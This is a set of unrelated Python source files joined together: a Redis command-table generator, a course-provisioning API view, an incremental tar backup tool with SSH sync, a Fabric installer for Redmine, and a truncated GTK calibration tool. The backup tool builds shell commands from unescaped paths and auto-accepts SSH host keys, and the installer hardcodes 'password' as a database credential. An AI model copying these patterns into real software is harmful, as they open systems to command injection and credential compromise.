'ZRANGEBYSCORE': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZRANK': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZREM': {'arity': -3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'ZREMRANGEBYLEX': {'arity': 4L,
'flags': ['write'],
'key_spec': (1, 1, 1)},
'ZREMRANGEBYRANK': {'arity': 4L,
'flags': ['write'],
'key_spec': (1, 1, 1)},
'ZREMRANGEBYSCORE': {'arity': 4L,
'flags': ['write'],
'key_spec': (1, 1, 1)},
'ZREVRANGE': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZREVRANGEBYLEX': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZREVRANGEBYSCORE': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZREVRANK': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZSCAN': {'arity': -3L,
'flags': ['readonly', 'random'],
'key_spec': (1, 1, 1)},
'ZSCORE': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZUNIONSTORE': {'arity': -4L,
'flags': ['write', 'denyoom', 'movablekeys'],
'key_spec': (0, 0, 0)}}
if __name__ == '__main__':
import redis
import pprint
rv = {}
for row in redis.Redis().execute_command('COMMAND'):
cmd, arity, flags, first_key, last_key, step_count = row
rv[cmd.upper()] = {
'arity': arity,
'flags': flags,
'key_spec': (int(first_key), int(last_key), int(step_count)),
}
tail = []
with open(__file__.rstrip('co'), 'r+') as f:
for line in f:
if line.strip() == "if __name__ == '__main__':":
tail.append(line)
tail.extend(f)
break
f.seek(0)
f.truncate(0)
f.write('# flake8: noqa\n\nCOMMANDS = %s\n\n\n%s' % (
pprint.pformat(rv, width=74),
''.join(tail)))
| |
# Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from sis_provisioner.dao.course import (
get_sections_by_instructor_and_term, valid_academic_course_sis_id,
valid_adhoc_course_sis_id)
from sis_provisioner.dao.term import get_term_by_year_and_quarter
from sis_provisioner.dao.user import get_person_by_netid, get_person_by_regid
from sis_provisioner.models.group import Group
from sis_provisioner.models.course import Course
from sis_provisioner.views.admin import RESTDispatch
from sis_provisioner.exceptions import CoursePolicyException
from logging import getLogger
import json
import re
logger = getLogger(__name__)
class CourseInvalidException(Exception):
pass
class CourseView(RESTDispatch):
""" Performs actions on a Course at /api/v1/course/<course id>.
GET returns 200 with Course details.
PUT returns 200 and updates the Course information.
"""
def get(self, request, *args, **kwargs):
try:
course = Course.objects.get(
course_id=self._normalize(kwargs['course_id']))
json_data = course.json_data(
include_sws_url=self.can_view_source_data(request))
return self.json_response(json_data)
except Course.DoesNotExist:
return self.error_response(404, "Course not found")
def put(self, request, *args, **kwargs):
try:
course = Course.objects.get(
course_id=self._normalize(kwargs['course_id']))
except Course.DoesNotExist:
return self.error_response(404, "Course not found")
if course.queue_id is not None:
return self.error_response(409, "Course already being provisioned")
body = request.read()
try:
new_values = json.loads(body)
except Exception as err:
return self.error_response(400, "Unable to parse JSON: {}".format(
err))
try:
# only priority PUTable right now
priority = new_values.get('priority', '').lower()
course.update_priority(priority)
json_data = course.json_data(
include_sws_url=self.can_view_source_data(request))
return self.json_response(json_data)
except CoursePolicyException as err:
return self.error_response(400, err)
def _normalize(self, course):
""" normalize course id case
"""
course = course.strip()
try:
valid_academic_course_sis_id(course)
except CoursePolicyException:
try:
valid_adhoc_course_sis_id(course.lower())
return course.lower()
except CoursePolicyException:
pass
return course
class CourseListView(RESTDispatch):
""" Retrieves a list of Courses at /api/v1/courses/?<criteria[&criteria]>.
GET returns 200 with Course details.
"""
def __init__(self):
self._criteria = [
{
'term': 'year',
'test': re.compile(r'^\d{4}$').match,
'required': True
},
{
'term': 'quarter',
'test': re.compile(
r'^(?:winter|spring|summer|autumn)+$', re.I).match,
'required': True,
'case': 'lower'
},
{
'term': 'curriculum_abbreviation',
'test': re.compile(r'^[a-z &]+$', re.I).match,
'case': 'upper'
},
{
'term': 'course_number',
'test': re.compile(r'^\d{3}$').match,
},
{
'term': 'section',
'test': re.compile(r'^[a-z]{1,2}$', re.I).match,
'case': 'upper'
}
]
def get(self, request, *args, **kwargs):
json_rep = {
'courses': []
}
filt_kwargs = None
if 'queue_id' in request.GET:
queue_id = request.GET.get('queue_id', '').strip()
if re.match(r'^[0-9]+$', str(queue_id)):
filt_kwargs = {'queue_id': queue_id}
else:
err = 'invalid queue_id: {}'.format(queue_id)
logger.error(err)
return self.error_response(400, err)
else:
provisioned_error = request.GET.get('provisioned_error')
if provisioned_error:
filt_kwargs = {
'provisioned_error': self._is_true(provisioned_error),
'queue_id__isnull': True
}
if filt_kwargs:
try:
filt_kwargs['priority__gt'] = Course.PRIORITY_NONE
course_list = list(Course.objects.filter(
**filt_kwargs).order_by('course_id'))
include_sws_url = self.can_view_source_data(request)
for course in course_list:
json_data = course.json_data(include_sws_url)
json_rep['courses'].append(json_data)
return self.json_response(json_rep)
except Exception as err:
logger.error('Course search fail: {}'.format(err))
return self.error_response(400, err)
net_id = None
reg_id = None
try:
if 'net_id' in request.GET:
net_id = self.netid_from_request(request.GET)
elif 'reg_id' in request.GET:
reg_id = self.regid_from_request(request.GET)
else:
self._criteria[2]['required'] = True
filter_terms = self._valid_course_filter(request)
filter_prefix = '-'.join(filter_terms)
course_list = list(Course.objects.filter(
course_id__startswith=filter_prefix).order_by('course_id'))
except CourseInvalidException as err:
return self.error_response(400, err)
except Exception as err:
logger.error('Course filter fail: {}'.format(err))
return self.error_response(400, err)
if (net_id is not None or reg_id is not None) and len(course_list):
try:
if net_id is not None:
instructor = get_person_by_netid(net_id)
else:
instructor = get_person_by_regid(reg_id)
year = request.GET.get('year')
quarter = request.GET.get('quarter')
term = get_term_by_year_and_quarter(year, quarter)
valid = []
for section in get_sections_by_instructor_and_term(
instructor, term):
valid.append('-'.join([
section.term.canvas_sis_id(),
section.curriculum_abbr.upper(),
section.course_number,
section.section_id.upper()]))
except Exception as err:
logger.error('Section search fail: {}'.format(err))
return self.error_response(400, err)
include_sws_url = self.can_view_source_data(request)
for course in course_list:
if 'valid' in locals() and course.course_id not in valid:
continue
json_data = course.json_data(include_sws_url)
json_rep['courses'].append(json_data)
return self.json_response(json_rep)
def _valid_course_filter(self, request):
values = []
for filter in self._criteria:
value = request.GET.get(filter['term'], '').strip()
if value is None or not len(value):
if 'required' in filter and filter['required'] is True:
raise CourseInvalidException(
'{} query term is required'.format(filter['term']))
else:
break
elif filter['test'](value):
if 'case' in filter:
if filter['case'] == 'upper':
value = value.upper()
else:
value = value.lower()
values.append(value)
else:
raise CourseInvalidException('{} is invalid'.format(
filter['term']))
return values
def _is_true(self, val):
return True if (
val == '1' or re.match(r'^(yes|true)$', val, re.I)) else False
| |
#!/usr/bin/env python3
"""
File: tar-smart-backup.py
Author: Evgeniy Klemin
Email: evgeniy.klemin@gmail.com
Github: https://github.com/evgeniy-klemin/tar-smart-backup
Description: Backup directory by incremental tar
"""
import argparse
import sys
import subprocess
import os
import errno
import shutil
import logging
import paramiko
logging.basicConfig(stream=sys.stdout, level=logging.ERROR)
logger = logging.getLogger(__name__)
TAR_COMMAND_BACKUP = "/bin/tar --file={filename} --listed-incremental={snap} --ignore-failed-read --one-file-system --recursion --preserve-permissions -C {source_dir_parent} -cpz {source_dir_basename}"
TAR_COMMAND_RESTORE = "/bin/tar --extract --strip-components 1 --ignore-failed-read --preserve-permissions --recursion --listed-incremental={snap} --file {filename} -C {destination_dir}"
EXT = '.tar.gz'
class DefaultHelpParser(argparse.ArgumentParser):
def __init__(self, *args, **kwargs):
defkwargs = {
'formatter_class': argparse.ArgumentDefaultsHelpFormatter
}
defkwargs.update(kwargs)
super(DefaultHelpParser, self).__init__(*args, **defkwargs)
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
def create_argparse():
parser = DefaultHelpParser(description='Backup directory.')
parser.add_argument('name', help='Name of backup')
parser.add_argument('--sync', action='store_true',
help='Sync with remote throuh ssh')
parser.add_argument('--ssh-key-rsa', help='Private RSA key')
parser.add_argument('--ssh-host', help='SSH host')
parser.add_argument('--ssh-port', default=22, help='SSH port')
parser.add_argument('--ssh-user', default='app', help='SSH port')
parser.add_argument('--remote-dir', default='/home/app/backups',
help='Dir in remote backup server')
subparsers = parser.add_subparsers(dest='action', help='Action')
parser_backup = subparsers.add_parser('backup', help='Backup')
parser_backup.add_argument('src', help='Directory for backup (source)')
parser_backup.add_argument('--levels', type=int, default=4,
help='Max snapshot levels')
parser_backup.add_argument('--count', type=int, default=5,
help='Count snapshots on each levels')
parser_backup.add_argument('--dst', default='.', help='Where hold backups')
parser_restore = subparsers.add_parser('restore', help='Restore')
parser_restore.add_argument('dst', help='Directory for extract (destination)')
parser_restore.add_argument('--src', default='.', help='Where hold backups')
return parser
def main():
"""Main"""
parser = create_argparse()
args = parser.parse_args()
if args.action == 'backup':
sys.exit(backup(args))
if args.action == 'restore':
sys.exit(restore(args))
sys.exit(1)
def silentremove(filename):
"""Remove file if exists
"""
try:
os.remove(filename)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def backup_full(args):
"""""Full backup
Returns:
int: exit code from tar
"""
snap = "{}-snar-0".format(args.name)
snap_path = os.path.join(args.dst, snap)
filename = "{}.tar.gz".format(args.name)
file_path = os.path.join(args.dst, filename)
silentremove(snap_path)
silentremove(file_path)
source_dir_parent = os.path.abspath(os.path.join(args.src, os.pardir))
source_dir_basename = os.path.basename(args.src)
command = TAR_COMMAND_BACKUP.format(
filename=file_path, snap=snap_path, source_dir_parent=source_dir_parent,
source_dir_basename=source_dir_basename
)
logger.debug("shell command: {}".format(command))
rc = subprocess.call(command, shell=True)
return (rc, filename, snap)
def backup_incremental(args, levels):
"""Incremental backup
Returns:
int: exit code from tar
"""
level = len(levels)
num = levels[len(levels) - 1]
parent_snap = "{}-snar-{}".format(args.name, level - 1)
parent_snap = os.path.join(args.dst, parent_snap)
snap = "{}-snar-{}".format(args.name, level)
snap_path = os.path.join(args.dst, snap)
old_snap = "{}-snar-{}.old".format(args.name, level)
old_snap = os.path.join(args.dst, old_snap)
if not os.path.isfile(snap_path):
shutil.copyfile(parent_snap, snap_path)
silentremove(old_snap)
shutil.copyfile(snap_path, old_snap)
filename = args.name
for num in levels:
filename += "_{:0>2}".format(num)
filename += ".tar.gz"
file_path = os.path.join(args.dst, filename)
source_dir_parent = os.path.abspath(os.path.join(args.src, os.pardir))
source_dir_basename = os.path.basename(args.src)
command = TAR_COMMAND_BACKUP.format(
filename=file_path, snap=snap_path, source_dir_parent=source_dir_parent,
source_dir_basename=source_dir_basename
)
logger.debug("shell command: {}".format(command))
rc = subprocess.call(command, shell=True)
return (rc, filename, snap)
def is_snap(name, filename):
"""Test is snap file
>>> is_snap('mybackup', 'mybackup-snar-0')
True
>>> is_snap('mybackup', 'mybackup-snar-1')
True
"""
ln = len(name)
return filename[:ln] == name\
and filename[ln:ln + len('-snar-')] == '-snar-'
def is_arch(name, filename):
"""Test is arch(snapshot) file
>>> is_arch('mybackup', 'mybackup.tar.gz')
True
>>> is_arch('mybackup', 'mybackup_01.tar.gz')
True
"""
ln = len(name)
return filename[:len(name)] == name and filename[-len(EXT):] == EXT
def find_files(name, destination_dir):
"""Find snapshot files
Returns:
list
"""
return sorted(
filename
for filename in os.listdir(destination_dir)
if is_arch(name, filename)
)
def find_snap_files(name, destination_dir):
"""Find snap files
Returns:
list
"""
return sorted(
filename
for filename in os.listdir(destination_dir)
if is_snap(name, filename)
)
def parse_filename(name, filename):
"""Parse snapshot filename
Examples:
>>> list(parse_filename('data', 'data_01_03.tar.gz'))
[(0, 1), (1, 3)]
>>> list(parse_filename('data', 'data_02_05_01.tar.gz'))
[(0, 2), (1, 5), (2, 1)]
Yields:
tuple(int, int)
"""
item = filename[len(name) + 1:-len(EXT)]
parts = item.split('_')
for part_index in range(len(parts)):
try:
value = int(parts[part_index])
except ValueError:
break
else:
yield (part_index, value)
def scan_dir(name, destination_dir):
"""Return list of levels with max num
Examples:
destination_dir content:
data.tar.gz
data_01.tar.gz
data_01_01.tar.gz
data_01_02.tar.gz
data_01_03.tar.gz
scan_dir('data', destination_dir)
[1, 3]
1: LEVEL-1 depth=1 num=1
3: LEVEL-1 depth=2 num=3
Returns:
list
"""
found = find_files(name, destination_dir)
if not found:
return None
res = []
for filename in found:
for part_index, value in parse_filename(name, filename):
if len(res) < part_index + 1:
res.append(value)
else:
res[part_index] = max(res[part_index], value)
return res
def find_files_for_delete(name, destination_dir, levels):
"""Clear old level snapshots
Returns:
list: List of old files for delete
"""
found = find_files(name, destination_dir)
res = []
for filename in found:
for part_index, value in parse_filename(name, filename):
if part_index > len(levels) - 2:
res.append(filename)
return res
def backup(args):
"""Backup directory
"""
levels = scan_dir(args.name, args.dst)
create_full = False
new_levels = list(levels) if levels else []
old_files_for_delete = []
if levels is None:
create_full = True
else:
if not levels:
new_levels.append(1)
else:
level = len(levels)
if level < args.levels - 1:
new_levels.append(1)
else:
last_num = new_levels[len(new_levels) - 1]
while last_num > args.count - 1:
old_files_for_delete += find_files_for_delete(args.name,
args.dst,
new_levels)
new_levels = new_levels[:-1]
if new_levels:
last_num = new_levels[len(new_levels) - 1]
else:
create_full = True
break
if new_levels:
new_levels[len(new_levels) - 1] += 1
if create_full:
logger.info("Create full backup, args: {}".format(args))
rc, filename, snap = backup_full(args)
else:
logger.info("Create incremental backup, args: {}".format(args))
rc, filename, snap = backup_incremental(args, new_levels)
if rc == 0:
if args.sync:
upload_file(filename, args)
upload_file(snap, args)
for filename in old_files_for_delete:
os.remove(os.path.join(args.dst, filename))
if args.sync and old_files_for_delete:
remote_delete(old_files_for_delete, args)
logger.info("Backup {} successed".format(args.name))
if args.sync:
sync_remote(args)
else:
logger.error("Backup with args: {} error".format(args))
return rc
def restore(args):
"""Restore backup to directory
"""
if args.sync:
download_files(args)
found = find_files(args.name, args.src)
if not os.path.exists(args.dst):
os.makedirs(args.dst)
snap = ''
for filename in found:
parts = list(parse_filename(args.name, filename))
snap = "{}-snar-{}".format(args.name, len(parts))
snap = os.path.join(args.src, snap)
file_path = os.path.join(args.src, filename)
command = TAR_COMMAND_RESTORE.format(
filename=file_path, destination_dir=args.dst, snap=snap
)
logger.debug("Shell command: {}".format(command))
rc = subprocess.call(command, shell=True)
if rc != 0:
logger.error("Restore with args: {} error".format(args))
return rc
logger.info("Restore {} successed".format(args.name))
return 0
def get_ssh_client(args):
"""Get ssh client
"""
c = paramiko.SSHClient()
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
key = None
if args.ssh_key_rsa:
key = paramiko.RSAKey.from_private_key_file(args.ssh_key_rsa)
c.connect(hostname=args.ssh_host, username=args.ssh_user,
port=args.ssh_port, pkey=key)
return c
def upload_file(filename, args):
"""Upload new file to remote server through sftp
"""
with get_ssh_client(args) as c:
with c.open_sftp() as sftp:
localpath = os.path.join(args.dst, filename)
remotepath = os.path.join(args.remote_dir, filename)
sftp.put(localpath, remotepath)
logger.info("Upload file {} successed".format(filename))
def remote_delete(files, args):
"""Delete files on remote server
"""
with get_ssh_client(args) as c:
files_for_args = ' '.join([
os.path.join(args.remote_dir, filename)
for filename in files
])
command = "rm -f {}".format(files_for_args)
stdin, stdout, stderr = c.exec_command(command)
stdin.close()
logger.info("Delete remote files {} successed".format(files))
def remote_find_files(client, args):
name = args.name
command = "ls -1 {}".format(args.remote_dir)
logger.debug("SSH command: {}".format(command))
stdin, stdout, stderr = client.exec_command(command)
stdin.close()
res = stdout.read()
logger.debug("SSH result: {}".format(res.splitlines()))
files = [filename.decode('utf-8') for filename in res.splitlines()]
arch_files = sorted(
filename for filename in files if is_arch(name, filename)
)
snap_files = sorted(
filename for filename in files if is_snap(name, filename)
)
return arch_files + snap_files
def download_files(args):
"""Download backup files from remote server through sftp
"""
with get_ssh_client(args) as c:
found = remote_find_files(c, args)
with c.open_sftp() as sftp:
for filename in found:
remotepath = os.path.join(args.remote_dir, filename)
localpath = os.path.join(args.src, filename)
silentremove(localpath)
sftp.get(remotepath, localpath)
logger.info("Download backup files successed")
def sync_remote(args):
"""Compare files in local and remote, upload if not found
"""
with get_ssh_client(args) as c:
remote_found = remote_find_files(c, args)
local_found = find_files(args.name, args.dst)
local_snap_found = find_snap_files(args.name, args.dst)
for local_filename in local_found + local_snap_found:
if local_filename not in remote_found:
logger.info("Upload missing file {}".format(local_filename))
upload_file(local_filename, args)
if __name__ == '__main__':
main()
| |
import os
from fabric.api import task, run, env, settings, cd
from fabtools.vagrant import ssh_config, _settings_dict
import fabtools
from fabtools import require
from fabric.contrib import files
@task
def vagrant(name=''):
config = ssh_config(name)
extra_args = _settings_dict(config)
env.update(extra_args)
env['user'] = 'root'
env['mysql_user'] = 'root'
env['mysql_password'] = os.environ.get('MYSQL_PASSWORD', 'password')
env['redmine_version'] = 'trunk'
# env['redmine_version'] = 'http://rubyforge.org/frs/download.php/76771/redmine-2.2.3.tar.gz'
def _add_user(*args, **kwargs):
require.user(*args, **kwargs)
if 'name' not in kwargs:
user = args[0]
else:
user = kwargs['name']
if not fabtools.files.is_file('/home/%s/.ssh/authorized_keys' % user):
run('mkdir -p /home/%s/.ssh/' % user)
run('cp /root/.ssh/authorized_keys /home/%s/.ssh/' % user)
run('chown %(user)s:%(user)s /home/%(user)s/.ssh/ -R' % {'user': user})
@task
def upgrade():
fabtools.deb.update_index()
fabtools.deb.upgrade()
@task
def install():
env['redmine_version'] = env.get('redmine_version', 'http://rubyforge.org/frs/download.php/76771/redmine-2.2.3.tar.gz')
require.deb.packages(['sudo'])
fabtools.require.system.locale('fr_FR.UTF-8')
fabtools.deb.update_index()
env['mysql_user'] = 'root'
env['mysql_password'] = os.environ.get('MYSQL_PASSWORD', 'password')
fabtools.deb.preseed_package('mysql-server', {
'mysql-server/root_password': ('password', env['mysql_password']),
'mysql-server/root_password_again': ('password', env['mysql_password']),
})
require.deb.packages([
'build-essential',
'devscripts',
'locales',
'apache2',
'mysql-server',
'mysql-client',
'vim',
'mc',
'curl',
'wget',
'ruby1.8',
'ruby1.8-dev',
'supervisor',
'python-pip',
'python-dev',
'subversion',
'libxslt1-dev',
'libxml2-dev',
'libmysqld-dev',
'libmagick++-dev',
'libsqlite3-dev'
])
require.deb.nopackages([
'rubygems',
'rubygems1.8'
])
_add_user(
name='redmine',
password=None,
shell='/bin/bash'
)
require.mysql.user('redmine', 'password')
require.mysql.database('redmine', owner='redmine')
with settings(user='redmine'):
run('mkdir -p ~/gem')
require.file(
'/home/redmine/ruby-env',
contents="""\
export GEM_HOME=~/gem
export RUBYLIB=~/lib
export PATH=~/bin:$GEM_HOME/bin:$PATH
export RAILS_ENV=production
"""
)
files.append('/home/redmine/.profile', 'source ~/ruby-env')
run('wget http://production.cf.rubygems.org/rubygems/rubygems-2.0.3.tgz')
run('tar xzf rubygems-2.0.3.tgz')
run('cd rubygems-2.0.3; ruby setup.rb --prefix=~ --no-format-executable')
run('rm -rf rubygems*')
run('gem install bundler')
if env['redmine_version'] == 'trunk':
run('svn co http://svn.redmine.org/redmine/trunk redmine-trunk')
run('mv redmine-trunk redmine')
else:
run('wget %s' % env['redmine_version'])
run('tar xzf redmine-*')
run('mv redmine-* redmine')
with cd('/home/redmine/redmine/'):
require.file(
'/home/redmine/redmine/config/database.yml',
"""\
production:
adapter: mysql2
database: redmine
host: localhost
socket: /var/run/mysqld/mysqld.sock
username: redmine
password: password
encoding: utf8
reconnect: true
test:
adapter: sqlite3
database: db/redmine.db
"""
)
require.file(
'/home/redmine/redmine/config/thin.conf',
"""\
daemonize: false
chdir: /home/redmine/redmine
pid: tmp/pids/thin.pid
log: log/thin.log
prefix: /
environment: production
"""
)
run('chmod 0600 config/database.yml')
files.append('/home/redmine/redmine/Gemfile', 'gem "thin"')
run('bundle install --without sqlite postgresql')
run('rake generate_secret_token')
run('rake db:migrate')
run('rake redmine:load_default_data REDMINE_LANG=en')
require.file(
'/etc/supervisor/conf.d/redmine.conf',
"""\
[program:redmine]
process_name=%(program_name)s_%(process_num)02d
directory=/home/redmine/redmine/
user=redmine
numprocs=2
autostart=true
autorestart=true
startsecs=10
redirect_stderr=true
stdout_logfile=/var/log/supervisor/redmine-thin.log
command=/home/redmine/gem/bin/thin -C config/thin.conf -p 30%(process_num)02d start
environment=GEM_HOME='/home/redmine/gem',RUBYLIB='/home/redmine/lib',RAILS_ENV='production'
"""
)
run('supervisorctl reload')
run('a2dissite default')
require.file(
'/etc/apache2/sites-available/redmine.conf',
"""\
<VirtualHost *:80>
ServerName redmine.fifiant.com
Redirect / https://redmine.fifiant.com/
</VirtualHost>
<VirtualHost *:443>
ServerName redmine.fifiant.com
DocumentRoot /home/redmine/redmine/public/
SSLEngine On
SSLCertificateFile /etc/ssl/localcerts/apache.pem
SSLCertificateKeyFile /etc/ssl/localcerts/apache.key
<Proxy *>
Order allow,deny
Allow from all
</Proxy>
ProxyPreserveHost On
ProxyTimeout 30
<Proxy balancer://redmine_app>
BalancerMember http://localhost:3000 max=1
BalancerMember http://localhost:3001 max=1
ProxySet maxattempts=3
Allow from all
</Proxy>
RewriteEngine On
RewriteCond %{LA-U:REQUEST_FILENAME} !-f
RewriteRule ^(.*) balancer://redmine_app/$1 [P,L]
RequestHeader set X_FORWARDED_PROTO 'https'
</VirtualHost>
""")
run('a2ensite redmine.conf')
run('a2enmod proxy')
run('a2enmod proxy_http')
run('a2enmod rewrite')
run('a2enmod headers')
run('a2enmod ssl')
run('a2enmod proxy_balancer')
if not fabtools.files.is_file('/etc/ssl/localcerts/apache.key'):
require.file(
'/tmp/openssl.cnf',
"""\
[ req ]
prompt = no
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
C = FR
ST = French
L = Pars
O = Example
OU = Org Unit Name
CN = Common Name
emailAddress = contact@example.com
"""
)
run('mkdir -p /etc/ssl/localcerts')
run('openssl req -config /tmp/openssl.cnf -new -x509 -days 365 -nodes -out /etc/ssl/localcerts/apache.pem -keyout /etc/ssl/localcerts/apache.key')
run('rm /tmp/openssl.cnf')
run('pip install mercurial')
run('/etc/init.d/apache2 force-reload')
| |
import logging
import traceback
from typing import Union, Tuple
import numpy as np
from gi.repository import Gtk
from matplotlib.backends.backend_gtk3 import NavigationToolbar2GTK3
from matplotlib.backends.backend_gtk3agg import FigureCanvasGTK3Agg
from matplotlib.figure import Figure
from matplotlib.widgets import Cursor
from sastool.classes2 import Curve
from sastool.io.credo_cct import Exposure
from sastool.misc.basicfit import findpeak_single
from sastool.misc.easylsq import nonlinear_odr
from sastool.misc.errorvalue import ErrorValue
from sastool.utils2d.centering import findbeam_radialpeak, findbeam_powerlaw
from ..core.exposureloader import ExposureLoader
from ..core.functions import update_comboboxtext_choices, savefiguretoclipboard
from ..core.plotcurve import PlotCurveWidget
from ..core.plotimage import PlotImageWidget
from ..core.toolwindow import ToolWindow, error_message
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def qfrompix(pix, pixelsize, beampos, alpha, wavelength, dist):
pixsizedivdist = pixelsize / dist
catethus_near = 1 + pixsizedivdist * (pix - beampos) * np.cos(alpha)
catethus_opposite = pixsizedivdist * (pix - beampos) * np.sin(alpha)
twotheta = np.arctan2(catethus_opposite, catethus_near)
return 4 * np.pi * np.sin(0.5 * twotheta) / wavelength
class Calibration(ToolWindow):
def __init__(self, *args, **kwargs):
self._cursor = None
self._exposure = None
self._curve = None
self._manualpickingconnection = None
self.plot2d = None
self.plot1d = None
self.figpairs = None
self.figpairscanvas = None
self.figpairstoolbox = None
self.figpairsaxes = None
self.exposureloader = None
self._dist = None
super().__init__(*args, **kwargs)
def init_gui(self, *args, **kwargs):
self.plot2d = PlotImageWidget()
self.builder.get_object('figbox_2d').pack_start(self.plot2d.widget, True, True, 0)
self.plot1d = PlotCurveWidget()
self.builder.get_object('figbox_1d').pack_start(self.plot1d.widget, True, True, 0)
self.figpairs = Figure(tight_layout=True)
self.figpairscanvas = FigureCanvasGTK3Agg(self.figpairs)
self.builder.get_object('figbox_distcalib').pack_start(self.figpairscanvas, True, True, 0)
self.figpairstoolbox = NavigationToolbar2GTK3(self.figpairscanvas, self.widget)
b = Gtk.ToolButton(icon_widget=Gtk.Image.new_from_icon_name('edit-copy', Gtk.IconSize.LARGE_TOOLBAR),
label='Copy')
b.set_tooltip_text('Copy the image to the clipboard')
b.connect('clicked', lambda b_, f=self.figpairs: savefiguretoclipboard(f))
self.figpairstoolbox.insert(b, 9)
self.builder.get_object('figbox_distcalib').pack_start(self.figpairstoolbox, False, True, 0)
self.figpairsaxes = self.figpairs.add_subplot(1, 1, 1)
logger.debug('Initializing EL')
self.exposureloader = ExposureLoader(self.instrument)
logger.debug('EL ready. Packing.')
self.builder.get_object('loadfile_expander').add(self.exposureloader)
logger.debug('EL packed. Connecting.')
self.exposureloader.connect('open', self.on_loadexposure)
self.exposureloader.connect('error', self.on_loadexposure_error)
logger.debug('Connected.')
tv = self.builder.get_object('pairview')
tc = Gtk.TreeViewColumn('Uncalibrated', Gtk.CellRendererText(), text=0)
tv.append_column(tc)
tc = Gtk.TreeViewColumn('Calibrated', Gtk.CellRendererText(), text=1)
tv.append_column(tc)
csel = self.builder.get_object('calibrant_selector')
csel.remove_all()
for calibrant in sorted(self.instrument.config['calibrants']):
csel.append_text(calibrant)
csel.set_active(0)
self.on_calibrant_selector_changed(csel)
def on_calibrant_selector_changed(self, csel: Gtk.ComboBoxText):
update_comboboxtext_choices(
self.builder.get_object('peak_selector'),
sorted(self.instrument.config['calibrants'][csel.get_active_text()]))
def on_peak_selector_changed(self, psel: Gtk.ComboBoxText):
calibrant = self.builder.get_object('calibrant_selector').get_active_text()
if calibrant is None:
return
peak = psel.get_active_text()
if peak is None:
return
self.builder.get_object('calval_adjustment').set_value(
self.instrument.config['calibrants'][calibrant][peak]['val'])
self.builder.get_object('calerr_adjustment').set_value(
self.instrument.config['calibrants'][calibrant][peak]['err'])
logger.debug('Set from calibrant.')
def on_addpair(self, button: Gtk.Button):
model = self.builder.get_object('pairstore')
calval = self.builder.get_object('calval_adjustment').get_value()
calerr = self.builder.get_object('calerr_adjustment').get_value()
uncalval = self.builder.get_object('uncalval_adjustment').get_value()
uncalerr = self.builder.get_object('uncalerr_adjustment').get_value()
cal = ErrorValue(calval, calerr)
uncal = ErrorValue(uncalval, uncalerr)
model.append((uncal.tostring(plusminus=' \u00b1 '), cal.tostring(plusminus=' \u00b1 '), uncalval, uncalerr,
calval, calerr))
self.replot_calpairs()
def replot_calpairs(self):
uncalval = []
uncalerr = []
calval = []
calerr = []
for row in self.builder.get_object('pairstore'):
uncalval.append(row[2])
uncalerr.append(row[3])
calval.append(row[4])
calerr.append(row[5])
self.figpairsaxes.clear()
self.figpairsaxes.errorbar(uncalval, calval, calerr, uncalerr, '.')
self.figpairsaxes.set_xlabel('Uncalibrated (pixel)')
self.figpairsaxes.set_ylabel('Calibrated (nm$^{-1}$)')
self.figpairscanvas.draw()
self.do_getdistance()
def on_removepair(self, button: Gtk.Button):
model, it = self.builder.get_object('pairview').get_selection().get_selected()
if it is None:
return
model.remove(it)
self.replot_calpairs()
def on_exportpairs(self, button: Gtk.Button):
pass
def on_overridemask_toggled(self, checkbutton: Gtk.CheckButton):
self.builder.get_object('maskchooser').set_sensitive(checkbutton.get_active())
def on_fitlorentz(self, button):
self.do_fit('Lorentz')
def on_fitgauss(self, button):
self.do_fit('Gauss')
def do_getdistance(self):
model = self.builder.get_object('pairstore')
uncalval = np.array([row[2] for row in model])
uncalerr = np.array([row[3] for row in model])
calval = np.array([row[4] for row in model])
calerr = np.array([row[5] for row in model])
logger.debug('Uncalval: ' + str(uncalval))
logger.debug('Uncalerr: ' + str(uncalerr))
logger.debug('Calval: ' + str(calval))
logger.debug('Calerr: ' + str(calerr))
assert isinstance(self._exposure, Exposure)
assert self._exposure.header.pixelsizex == self._exposure.header.pixelsizey
if len(uncalval) > 1:
def fitfunc(pix_: np.ndarray, dist: float):
return qfrompix(pix_, pixelsize=self._exposure.header.pixelsizex,
beampos=0, alpha=np.pi * 0.5,
wavelength=self._exposure.header.wavelength,
dist=dist)
self._dist, stat = nonlinear_odr(uncalval, calval, uncalerr, calerr, fitfunc, [100])
x = np.linspace(uncalval.min(), uncalval.max(), len(uncalval) * 100)
self.figpairsaxes.plot(x, fitfunc(x, self._dist.val), 'r-')
elif len(uncalval) == 1:
q = ErrorValue(float(calval[0]), float(calerr[0]))
pix = ErrorValue(float(uncalval[0]), float(uncalerr[0]))
wl = ErrorValue(
self._exposure.header.wavelength,
0) # wavelength error is not considered here:
# it has already been considered in the pixel value (peak position)
pixsize = self._exposure.header.pixelsizex
self._dist = (pix * pixsize) / (2.0 * (wl * q / 4.0 / np.pi).arcsin()).tan()
else:
self._dist = None
self.builder.get_object('distance_label').set_text('--')
self.builder.get_object('savedistance_button').set_sensitive(True)
return
self.builder.get_object('distance_label').set_text(self._dist.tostring(plusminus=' \u00b1 ') + ' mm')
self.builder.get_object('savedistance_button').set_sensitive(True)
self.figpairscanvas.draw()
def do_fit(self, curvetype: str):
xmin, xmax = self.plot1d.get_zoom_xrange()
assert isinstance(self._curve, Curve)
try:
x = self._curve.q
y = self._curve.Intensity
idx = (x >= xmin) & (x <= xmax)
x = x[idx]
y = y[idx]
dy = self._curve.Error[idx]
pos, hwhm, baseline, ampl = findpeak_single(x, y, dy)
x_ = np.linspace(x.min(), x.max(), len(x) * 10)
assert isinstance(x_, np.ndarray)
if curvetype == 'Gauss':
